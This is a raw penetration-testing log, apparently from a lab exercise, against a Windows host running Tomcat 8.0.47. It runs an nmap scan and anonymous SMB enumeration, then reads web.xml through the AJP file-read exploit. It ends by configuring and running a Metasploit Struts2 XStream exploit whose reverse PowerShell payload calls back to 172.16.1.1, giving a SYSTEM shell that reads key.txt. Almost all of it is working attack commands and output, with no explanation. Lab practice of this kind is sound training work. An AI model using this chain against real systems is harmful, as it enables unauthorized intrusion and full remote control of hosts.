nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 16:16 EST
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.49% done; ETC: 16:17 (0:00:00 remaining)
Nmap scan report for 10.11.1.109
Host is up (0.020s latency).
Not shown: 62096 closed tcp ports (reset), 3428 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
8009/tcp  open  ajp13         Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp  open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/8.0.47
|_http-favicon: Apache Tomcat
| http-robots.txt: 4 disallowed entries 
|_/docs /examples /manager /struts2-rest-showcase
|_http-server-header: Apache-Coyote/1.1
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49159/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/13%OT=135%CT=1%CU=43550%PV=Y%DS=2%DC=I%G=Y%TM=67A
OS:E6184%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=105%TI=I%TS=7)SEQ(SP=10
OS:5%GCD=1%ISR=106%TI=I%TS=7)OPS(O1=M5B4NW8ST11%O2=M5B4NW8ST11%O3=M5B4NW8NN
OS:T11%O4=M5B4NW8ST11%O5=M5B4NW8ST11%O6=M5B4ST11)WIN(W1=2000%W2=2000%W3=200
OS:0%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M5B4NW8NNS%CC=N%Q=)
OS:T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)
 
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2025-02-13T21:17:52
|_  start_date: 2025-02-13T20:16:13
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
 
TRACEROUTE
HOP RTT      ADDRESS
1   19.98 ms 10.11.1.109
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.76 seconds

445/tcp   open  microsoft-ds?

 smbclient  -N -L \\\\10.11.1.109
Anonymous login successful
 
	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.11.1.109 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

8009/tcp  open  ajp13         Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request

python2 48143.py -p 8009 -f 'WEB-INF/web.xml' 10.11.1.109 
Getting resource at ajp13://10.11.1.109:8009/asdf
----------------------------
<?xml version="1.0" encoding="ISO-8859-1"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at
 
      http://www.apache.org/licenses/LICENSE-2.0
 
  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd"
  version="3.1"
  metadata-complete="true">
 
  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to Tomcat
  </description>
 
</web-app>

8080/tcp  open  http          Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/8.0.47
|_http-favicon: Apache Tomcat
| http-robots.txt: 4 disallowed entries 
|_/docs /examples /manager /struts2-rest-showcase
|_http-server-header: Apache-Coyote/1.1

User-agent: *
Disallow: /docs
Disallow: /examples
Disallow: /manager
Disallow: /struts2-rest-showcase

msf6 exploit(multi/http/struts2_rest_xstream) > options
 
Module options (exploit/multi/http/struts2_rest_xstream):
 
   Name       Current Setting                       Required  Description
   ----       ---------------                       --------  -----------
   Proxies                                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.11.1.109                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                                              using-metasploit.html
   RPORT      8080                                  yes       The target port (TCP)
   SSL        false                                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /struts2-rest-showcase/orders/3/edit  yes       Path to Struts action
   URIPATH                                          no        The URI to use for this exploit (default is random)
   VHOST                                            no        HTTP server virtual host
 
 
   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.
                                       0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
 
 
Payload options (cmd/windows/reverse_powershell):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.1       yes       The listen address (an interface may be specified)
   LPORT  80               yes       The listen port
 
 
Exploit target:
 
   Id  Name
   --  ----
   1   Windows (In-Memory)

msf6 exploit(multi/http/struts2_rest_xstream) > run
 
[*] Started reverse TCP handler on 172.16.1.1:80 
[*] Command shell session 2 opened (172.16.1.1:80 -> 10.11.1.109:49314) at 2025-02-13 16:57:46 -0500
 
 
Shell Banner:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Program Files\Apache Software Foundation\Tomcat 8.0>
-----
          
 
C:\Program Files\Apache Software Foundation\Tomcat 8.0>whoami
whoami
nt authority\system
 
C:\Program Files\Apache Software Foundation\Tomcat 8.0>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
6f7rlecj04by2lvx28ao
C:\Program Files\Apache Software Foundation\Tomcat 8.0>date
date
The current date is: Thu 02/13/2025